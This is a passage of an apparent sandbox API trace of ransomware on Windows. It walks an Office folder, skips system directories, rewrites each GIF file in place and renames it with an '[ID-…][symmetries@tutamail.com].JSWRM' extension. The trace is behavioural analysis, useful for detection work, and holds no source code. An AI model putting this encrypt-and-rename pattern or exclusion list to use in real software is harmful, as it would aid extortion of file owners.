(HeapHandle=0x1e0000, Flags=0x0, Size=0x1b90) returned 0x24e1d8 [0120.659] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1b90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1b90, lpOverlapped=0x0) returned 1 [0120.661] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.661] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1b90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1b90, lpOverlapped=0x0) returned 1 [0120.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.662] CloseHandle (hObject=0x314) returned 1 [0120.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0120.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0120.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0120.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0120.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0120.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0120.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.662] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR49F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir49f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR49F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir49f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0120.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0120.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0120.663] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2fc2, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR4B.GIF", cAlternateFileName="")) returned 1 [0120.663] lstrcmpiW (lpString1="ZPDIR4B.GIF", lpString2=".") returned 1 [0120.663] lstrcmpiW (lpString1="ZPDIR4B.GIF", lpString2="..") returned 1 [0120.663] lstrcmpiW (lpString1="ZPDIR4B.GIF", lpString2="...") returned 1 [0120.663] lstrcmpiW (lpString1="ZPDIR4B.GIF", lpString2="windows") returned 1 [0120.663] lstrcmpiW (lpString1="ZPDIR4B.GIF", lpString2="recovery") returned 1 [0120.663] lstrcmpiW (lpString1="ZPDIR4B.GIF", lpString2="perflogs") returned 1 [0120.663] lstrcmpiW (lpString1="ZPDIR4B.GIF", lpString2="documents and settings") returned 1 [0120.663] lstrcmpiW (lpString1="ZPDIR4B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.663] lstrcmpiW (lpString1="ZPDIR4B.GIF", lpString2="system volume information") returned 1 [0120.663] lstrcmpiW (lpString1="ZPDIR4B.GIF", lpString2="msocache") returned 1 [0120.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0120.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR4B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR4B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR4B.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0120.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0120.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR4B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR4B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR4B.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0120.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0120.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0120.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0120.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR4B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir4b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.664] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12226) returned 1 [0120.664] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2fc0) returned 0x24e1d8 [0120.664] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2fc0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2fc0, lpOverlapped=0x0) returned 1 [0120.666] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.667] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2fc0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2fc0, lpOverlapped=0x0) returned 1 [0120.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.667] CloseHandle (hObject=0x314) returned 1 [0120.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0120.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0120.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0120.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0120.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0120.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0120.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.667] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR4B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir4b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR4B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir4b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0120.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0120.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0120.668] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8edb, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR4F.GIF", cAlternateFileName="")) returned 1 [0120.668] lstrcmpiW (lpString1="ZPDIR4F.GIF", lpString2=".") returned 1 [0120.668] lstrcmpiW (lpString1="ZPDIR4F.GIF", lpString2="..") returned 1 [0120.668] lstrcmpiW (lpString1="ZPDIR4F.GIF", lpString2="...") returned 1 [0120.668] lstrcmpiW (lpString1="ZPDIR4F.GIF", lpString2="windows") returned 1 [0120.668] lstrcmpiW (lpString1="ZPDIR4F.GIF", lpString2="recovery") returned 1 [0120.668] lstrcmpiW (lpString1="ZPDIR4F.GIF", lpString2="perflogs") returned 1 [0120.668] lstrcmpiW (lpString1="ZPDIR4F.GIF", lpString2="documents and settings") returned 1 [0120.668] lstrcmpiW (lpString1="ZPDIR4F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.668] lstrcmpiW (lpString1="ZPDIR4F.GIF", lpString2="system volume information") returned 1 [0120.668] lstrcmpiW (lpString1="ZPDIR4F.GIF", lpString2="msocache") returned 1 [0120.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0120.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR4F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR4F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR4F.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0120.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0120.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR4F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR4F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR4F.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0120.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0120.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0120.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0120.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR4F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir4f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.669] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=36571) returned 1 [0120.669] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8ed0) returned 0x24e1d8 [0120.670] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x8ed0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x8ed0, lpOverlapped=0x0) returned 1 [0120.673] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.673] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x8ed0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x8ed0, lpOverlapped=0x0) returned 1 [0120.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.674] CloseHandle (hObject=0x314) returned 1 [0120.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0120.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0120.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0120.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0120.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0120.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0120.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.674] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR4F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir4f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR4F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir4f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0120.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0120.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0120.675] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae23ccd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10a7, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR50B.GIF", cAlternateFileName="")) returned 1 [0120.675] lstrcmpiW (lpString1="ZPDIR50B.GIF", lpString2=".") returned 1 [0120.675] lstrcmpiW (lpString1="ZPDIR50B.GIF", lpString2="..") returned 1 [0120.675] lstrcmpiW (lpString1="ZPDIR50B.GIF", lpString2="...") returned 1 [0120.675] lstrcmpiW (lpString1="ZPDIR50B.GIF", lpString2="windows") returned 1 [0120.675] lstrcmpiW (lpString1="ZPDIR50B.GIF", lpString2="recovery") returned 1 [0120.675] lstrcmpiW (lpString1="ZPDIR50B.GIF", lpString2="perflogs") returned 1 [0120.675] lstrcmpiW (lpString1="ZPDIR50B.GIF", lpString2="documents and settings") returned 1 [0120.675] lstrcmpiW (lpString1="ZPDIR50B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.675] lstrcmpiW (lpString1="ZPDIR50B.GIF", lpString2="system volume information") returned 1 [0120.675] lstrcmpiW (lpString1="ZPDIR50B.GIF", lpString2="msocache") returned 1 [0120.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0120.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR50B.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR50B.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR50B.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0120.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0120.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR50B.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR50B.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR50B.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0120.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0120.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0120.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0120.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR50B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir50b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.676] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4263) returned 1 [0120.676] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10a0) returned 0x24e1d8 [0120.676] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x10a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x10a0, lpOverlapped=0x0) returned 1 [0120.678] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.678] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x10a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x10a0, lpOverlapped=0x0) returned 1 [0120.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.678] CloseHandle (hObject=0x314) returned 1 [0120.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0120.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.678] RtlAllocateHeap (HeapHandle=0x1e0000, 